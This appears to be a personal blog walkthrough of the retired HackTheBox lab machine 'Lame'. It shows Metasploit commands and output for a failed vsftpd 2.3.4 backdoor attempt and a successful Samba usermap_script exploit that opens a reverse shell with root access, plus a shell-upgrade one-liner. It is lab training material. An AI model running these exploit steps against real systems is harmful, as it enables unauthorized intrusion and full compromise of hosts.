HackTheBox “Lame” (Retired) Walkthrough

A week after completing my OSCP, I was already having withdrawals and signed up for a VIP account on HackTheBox.  A VIP account (roughly $12/month) gives you access to retired machines, as well as a smoother experience overall (less crowded).  HTB has been a good resource for me so I don’t mind sending them money.  : )

HTB rules say not to write walkthroughs for active boxes, so some of the other boxes I’ve done will have to wait until they’re retired.  In the meantime, here’s a walkthrough for one of the easier retired boxes, “Lame”.

Side note:  I’m trying to remove the word “lame” from my vocabulary.

This box has been rated on the easier end by HTB community members:

We start off with nmap to discover the open ports.  We can see that there’s FTP (port 21), SSH (port 22), and two ports relating to Samba (ports 139 and 445).

FTP

One of the first things covered in OSCP was anonymous logins to FTP servers, and FTP was the first thing in the Nmap results, so that’s what I tried first:

Success!  I was able to login with username “anonymous” and a blank password… but that’s about as far as that idea got me.  I wasn’t able to find or add anything useful.  So, on to the next idea.

If we check ExploitDB for the version of vsftpd (“Very Secure” FTP) running on this machine, which is 2.3.4, we find a match!

So, let’s fire up Metasploit (msfconsole) and try it out:

You can use search vsftpd to find the exploit that ExploitDB is referencing.  Then, use exploit/unix/ftp/vsftpd_234_backdoor and set RHOST 10.10.10.3 to tell Metasploit which machine to target.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(unix/ftp/vsftpd_234_backdoor) > show info

Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03

Provided by:
hdm <x@hdm.io>
MC <mc@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)

Payload information:
Space: 2000
Avoid: 0 characters

Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.

References:
CVE: Not available
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3

msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

However, it doesn’t work.  Womp womp.  On to the next idea…

SSH

Next, we look at the SSH port… is there anything exploitable here?  A search of ExploitDB and Metasploit modules (via search openssh) doesn’t turn up anything too promising, so let’s move onto other ideas.  If we didn’t have any untested ports left, I might have dug deeper here, or tried to debug the VsFTPd exploit.

Samba

In any case, we move on to the remaining two ports, and the “Samba 3.x – 4.x” software running on them.

Searching ExploitDB for “Samba” returns 5 pages of results (!!).  Similarly, a search of Metasploit modules returns a ton of options:

We can narrow down the list a bit based on version number (so, anything that doesn’t apply to versions “3.x – 4x” are out).  After that point, we’re still left with a lot of options, so I tend to things down based on the “Rank” in Metasploit, or whether its been verified on ExploitDB.

The first “excellent” option, is_known_pipename, says in the Metasploit show info blurb that it requires “valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder.”  Since we don’t have that… let’s move on to the next option.

The next option is usermap_script, a RCE exploit that does not require any authentication.  We set our RHOST to 10.10.10.3:

Then we run the exploit.  After avoid the use of Metasploit on the OSCP labs, doing a one-and-done Metasploit RCE module seems a bit like cheating.  That’s probably why this box was marked as easy.

So, it works!  The shell we get back is kind of crappy, so I use python -c 'import pty; pty.spawn("/bin/sh")' to make it nicer.

msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0UfWkKEzrDN9kk2c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0UfWkKEzrDN9kk2c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.3:55015) at 2019-05-29 21:07:05 -0400

python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2# id
id
uid=0(root) gid=0(root)

Luckily for us, we’re already root!

As with all HTB machines, there are two flags we want to get.  One is user.txt in one of the /home/user directories, and the other is root.txt in the /root directory.

After trying the different folders in the /home directory, we find the user flag at /home/makis/user.txt

Then, grabbing the root flag is easy.  It’s at /root/root.txt

And that’s it!  I’m planning on doing more walkthroughs in the future and publishing them as the boxes are retired.  🙂

If you’d like to read more about the Samba vulnerability used to exploit this box, check out CVE-2007-2447 (original Samba.org link here).